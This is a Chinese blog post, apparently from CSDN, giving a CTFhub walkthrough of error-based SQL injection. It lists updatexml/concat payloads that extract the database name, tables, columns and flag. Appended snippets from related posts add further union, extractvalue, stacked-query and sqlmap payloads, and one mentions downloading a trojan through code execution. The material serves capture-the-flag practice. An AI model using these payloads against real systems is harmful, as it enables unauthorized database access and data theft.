CTFhub-sqli注入-报错注入

最新推荐文章于 2024-03-01 20:40:00 发布
最新推荐文章于 2024-03-01 20:40:00 发布
阅读量1.3k 收藏
点赞数
分类专栏: CTF--SQL注入 文章标签: sql mybatis 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ssss39/article/details/132481296
版权

用到的函数

updatexml(1,       ,1)

concat(0x7e,       ,0x7e)

group_concat(目标值)

right(,32) 

1

1'

 1 union select updatexml(1,concat(0x7e,database(),0x7e),1)

1 union select updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema='sqli'),0x7e),1)

1 union select updatexml(1,concat(0x7e,(select(group_concat(column_name))from information_schema.columns where table_schema='sqli' and table_name='flag'),0x7e),1)

 1 union select updatexml(1,concat(0x7e,(select(group_concat(flag))from sqli.flag),0x7e),1)

 1 union select updatexml(1,concat(0x7e,right((select(group_concat(flag))from sqli.flag),32),0x7e),1)

二、CTF-Web-SQLi-Labs(记录CTF学习)
qq_27920699的博客
12-16 430
个人CTF学习之路
CTFHUB-web-SQL注入
ookami6497的博客
11-29 975
CTFHUB SQL
i春秋之SQLi--“百度杯”CTF比赛 九月场
金 帛的博客
04-04 1032
i春秋WP
青少年CTF平台---sqli-labs
t235336456的博客
11-30 577
看到有个flag表然后查看段名(id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='flag' --+)查数据(id=-1' union select 1,group_concat(0x7e,flag),3 from security.flag --+)题目:sqli-labs。到4的时候会返回错误信息。
“百度杯”CTF比赛 九月场SQLi ---------mozhe
weixin_40709439的博客
08-25 1523
题目链接:https://www.ichunqiu.com/battalion 点击进去,查看源代码  发现login.php?id=1 一般是存在sql注入的,可是我测试了好几遍,sqlmap也跑过了,也没发现啥 没办法,查看了官方wp,说是存在index.php,并在其header头有真正的注入点 在index.php请求进行301重定向,明显发现上面的链接只差一个字母,...
CTFSqli-Labs题目解析(1-11题)
a690135443的博客
06-14 1428
第一题 提示输入numeric类型的ID作为参数,尝试在url后添加?id=1查看,发现有显示。 改为?id=-1后无显示,也无报错,于是可以考虑-1空出位置后加union select爆数据。 改为?id=1'单引号报错,双引号不报错,可以推断出使用单引号闭合,加上注释之后,错误也消失了,所以可以在这个时候union select了。 然后添加order by语句,?id=1' order by 4 --+,当order by 4的时候报错,所以一共有3个字段。 然后使用unio
ctfhub-web-sql-整型注入/字符型注入/报错注入/布尔盲注/时间盲注/mysql结构/cookie注入/ua注入
2301_80162151的博客
03-01 924
id=1’ and sleep(5) --+,看网络有没有延迟,有的话就是存在时间盲注。(完全没变化的页面,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。技能树的这些sql,肯定是存在,所以直接sqlmap获取库名。sqlmap -u url -D 库名 --tables。时间型的注入遇到的条件更为苛刻,数据交互完成以后目标网站。聚合函数也称作计数函数,返回查询对象的总数。判断页面是否正常,1=1和1=2是俩个页面。慢慢等一会,他有点慢,出现了库名sqli。函数 获取字符串的长度。
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1332
CTFHUB-WEB-SQL注入
CTFHUB-WEB-SQL注入【04】整数、字符、报错注入、布尔盲注、时间盲注、cookie注入、UA注入、refer注入
(∪.∪ )...zzz的博客
06-10 404
字符型注入 1. 输入1:1被引起 1 2. ’ 提前闭合 ?id=1’ and 1=1–+ 3. 求列数 ?id=1’ order by 2–+ 4. 求数据库名 ?id=-1' union select database(),2--+ 5. 求表名 ?id=-1' union select group_concat(table_name) ,2 from information_schema.tables where table_schema='sqli' --+ 数据库名是sqli 6.
网络知识扫盲
weixin_34416649的博客
05-29 167
SQL 注入 通过在用户可控参数中注入 SQL 语法,破坏原有 SQL 结构,达到编写程序时意料之外结果的攻击行为。其成因可以归结为以下两个原因叠加造成的: 1. 程序编写者在处理应用程序和数据库交互时,使用字符串拼接的方式构造 SQL 语句 2. 未对用户可控参数进行足够的过滤便将参数内容拼接进入到 SQL 语句中 XSS 跨站脚本攻击 跨站脚本攻击(Cross Site Script...
ctf supersqli
weixin_45945976的博客
10-28 360
堆叠注入 正常访问如下 在1后门加 ‘ 报错 可能存在注入: order by 测试猜测字段 发现有两个: union select 1,2查询回显,发现select、where等字符被过滤: 尝试堆叠注入 =1’ ;show databases;–+ 发现能够回显库名: 继续堆叠注入 =1’;show tables;–+ 堆叠注入爆出列名 =1’;show columns from words;–+ 没有敏感信息: 堆叠注入查询1919810931114514表中所有列 =1’;sho
“百度杯”CTF比赛 九月场 SQLi 解题思路
****的博客
10-15 1202
题目简介 题目名称:SQLi 题目内容:后台有获取flag的线索 解题思路 打开地址使用burp抓包发现“l0gin.php?id=1”。 打开“l0gin.php?id=1”地址 使用1’ and ‘1’=‘1(成功)和1’ and ‘1’='2(不成功),说明此处存在sql注入。测试中发现后台过滤了逗号,在这里使用from for代替逗号。 开始注入 猜测数据库名称 猜测数据库名...
BMZCTF sqli_double
qq_26243045的博客
11-29 481
考点:代码审计、sql注入 打开页面即可看到源码: 有两个页面,一个是修改密码的(需要知道用户名和邮箱),一个是登录页面。 因为我们不知道用户名和邮箱,先试试登录页面: 回显提示"登录失败",我们不知是密码还是用户名错了,尝试使用sqlmap进行爆破: 可以看到已经试出了数据库类型为mysql 爆库: 爆表: 爆内容: 现在我们知道了用户名和邮箱,就可以修改密码了。修改密码后登录,即可看到flag: ...
CTF 三大测试靶场搭建:DVWA、SQLi-LABS、upload-labs 靶场部署教程(VM + CentOS 7 + Docker)
zatongtong的博客
01-18 3610
基于 CentOS 7 系统,利用 Docker 部署 DVWA、SQLi-LABS、upload-labs 靶场,靶场的初始化,Docker 基本使用
CTF学习笔记——SQL注入
xuanyulevel6的博客
08-25 6055
以pikachu靶场练习来学习ctf知识
【安全测试学习】自动化注入攻击之 FuzzDB和Burp 组合拳
aovenus的专栏-测试新时代(微信公众号:测试新时代)
11-18 2293
自动化注入攻击之 FuzzDB和BurpSuite 组合拳
[NCTF2019]SQLi --BUUCTF --详解
金 帛的博客
06-13 1453
BUUCTF记录贴
ctf每日练习-第四天
想变得强大,虽然现在还弱不禁风
09-05 294
今天的内容主要是sqli,好几天没写首先因为这几天刚开学事情比较多,二是因为这几天一直都在学习,刷题反而不是很多,今天和同学去图书馆学了一波,感觉收获很大。 easy_sql(来自攻防世界web进阶区) 题目链接: easy_sql. 首先我们尝试一个单引号,报错 error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the
CTF渗透训练(笔记)
weixin_57536426的博客
12-26 1904
将该请求发送至repeater页面并且修改文件名为要执行的PHP代码,点击go将请求发出,点击Render查看图形化的响应页面,其中包含代码执行的结果.利用远程代码执行漏洞下载木马,因为需要绕过防火墙的原因所以对要执行的代码进行base64形式的编码,将生成的木马放到web网站的主目录下面
sqli-labs报错注入
最新发布
01-18
### 解决 sqli-labs 报错注入问题 在处理 `sqli-labs` 中的报错注入时,理解如何利用 MySQL 的错误消息来获取有用的信息至关重要。通过构造特定的 SQL 查询语句,可以触发数据库返回详细的错误信息,从而揭示隐藏的数据。 #### 使用 `extractvalue()` 函数引发 XML 错误 一种常见的方法是使用 `extractvalue()` 函数来制造 XML 解析错误。此函数尝试解析给定字符串作为 XML 文档的一部分,并从中提取指定节点的内容。如果提供的参数不合法,则会抛出异常并显示具体的表名或列名。 ```sql ?id=1 AND (SELECT extractvalue(1, CONCAT(0x5c, (SELECT database())))) ``` 上述查询试图将当前使用的数据库名称连接到一个非法的 XPath 表达式上,导致服务器响应中包含目标库的名字[^1]。 #### 利用 `updatexml()` 函数生成自定义错误 另一种有效的方式是调用 `updatexml()` 来创建带有额外路径片段的 XML 数据结构。当第二个参数指向不存在的位置时,MySQL 将报告找不到相应位置的消息;而第三个参数则允许嵌入任意文本串——这正是实施盲注攻击的关键所在: ```sql ?id=1 AND updatexml(1, concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 1)),1) ``` 这段代码旨在让 Web 应用程序显示出第一个匹配表格的名字。注意这里的 `information_schema.tables` 是用来列举所有可用表的一个元数据视图。 为了更高效地探索整个架构,在成功取得初始入口之后还可以继续深入挖掘其他感兴趣的实体,比如查看某张表内的字段列表: ```sql ?id=1 AND updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_name='users')),1) ``` 这里假设存在一张名为 "users" 的用户资料记录表。当然实际操作过程中应当替换为目标站点真实的对象命名。 最后提醒一点安全事项:尽管这些技巧对于学习目的非常有价值,但在未经授权的情况下对他人系统执行此类测试属于违法行为。务必仅限于个人实验环境内练习!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

斜躺青年

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值